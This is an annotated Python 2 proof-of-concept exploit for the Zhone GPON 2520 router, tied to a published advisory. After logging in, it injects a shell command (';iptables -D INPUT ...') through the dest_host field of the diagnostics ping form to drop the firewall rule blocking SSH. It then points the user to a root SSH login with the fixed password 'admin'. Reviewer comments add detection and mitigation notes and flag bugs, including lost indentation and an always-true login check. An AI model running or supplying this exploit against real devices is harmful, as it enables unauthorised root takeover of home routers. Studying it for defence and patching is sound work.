- # http://websec.ca/advisories/view/Zhone-GPON-2520-remote-root-shell-backdoor
- #!/usr/bin/python2
- from httplib2 import Http  # third-party HTTP client; the print statements and urllib.urlencode make this Python 2 only
- from urllib import urlencode
- import sys,time
- # main function: proof of concept for the advisory linked above. It logs in to the device's web UI, sends one diagnostics (ping) form whose dest_host field carries a shell command, then logs out.
- if __name__ == "__main__":  # NOTE(review): the paste lost all indentation, so the nesting of the statements below cannot be recovered from this listing
- if (len(sys.argv) != 4):  # three arguments are read below: host, web user, web password
- print '*********************************************************************************'
- print ' GPON Zhone R4.0.2.566b RCE & Backdoor'
- print ' Tested on'
- print ' GPON Zhone 2520'
- print ' Hardware: 0040-48-02'
- print ' Software: R4.0.2.566b'
- print ' '
- print ' Usage : python', sys.argv[0] + ' <web_user> <web_pass>'  # NOTE(review): usage text omits the host argument that the example on the next line and sys.argv[1] both expect
- print ' Ex : python',sys.argv[0] + ' 192.168.15.1 root admin'
- print ' Author : Kaczinski lramirez@websec.mx '
- print ' URL : http://www.websec.mx/advisories'
- print '*********************************************************************************'
- sys.exit()
- HOST = sys.argv[1]
- USER = sys.argv[2]
- PASS = sys.argv[3]
- print '*********************************************************************************'
- print '[+] Logging in to the router: '+ HOST
- print '[+] User: '+USER
- print '[+] Pass: '+PASS  # echoes the supplied password to stdout in clear text
- h = Http()
- h.follow_redirects = True
- data = dict(XWebPageName="index", username=USER, password=PASS)
- resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))  # login form is POSTed over plain http://, so the credentials cross the network unencrypted
- result = content.find("")  # NOTE(review): find("") returns 0 for any response, so the failure branch below is never taken; the success marker may have been lost when the page was extracted -- confirm against the advisory
- if result < 0:
- print '[-] Authentication failed'
- print '*********************************************************************************'
- else:
- print '[+] Authentication succeeded'
- print '[+] Deleting the firewall rule that blocks SSH'
- data = dict(XWebPageName="diag", dest_host=";iptables -D INPUT -p all -j ACL", wan_conlist="default", diag_action="ping")  # dest_host begins with ';' followed by a command; presumably the device builds a shell ping command from this field without validating it (the advisory title calls this RCE). Detection: alert on diag_ZForm POSTs whose dest_host is not a plain hostname or IP address.
- resp, content = h.request("http://" + HOST + "/GponForm/diag_ZForm", "POST", urlencode(data))  # the response is not inspected, so the script cannot tell whether the rule was actually removed
- print '[+] The firewall rule should have been disabled, please ssh root@' + HOST + ' using admin as password to get your root shell :)'  # the message implies a fixed root/admin SSH login (the "backdoor" in the title); mitigation is to keep the web UI and SSH reachable only from trusted management networks and to check the advisory for fixed firmware
- print '[+] Done'
- resp, content = h.request("http://" + HOST + "/logout.html", "GET")  # ends the web session opened by the login request
- sys.exit()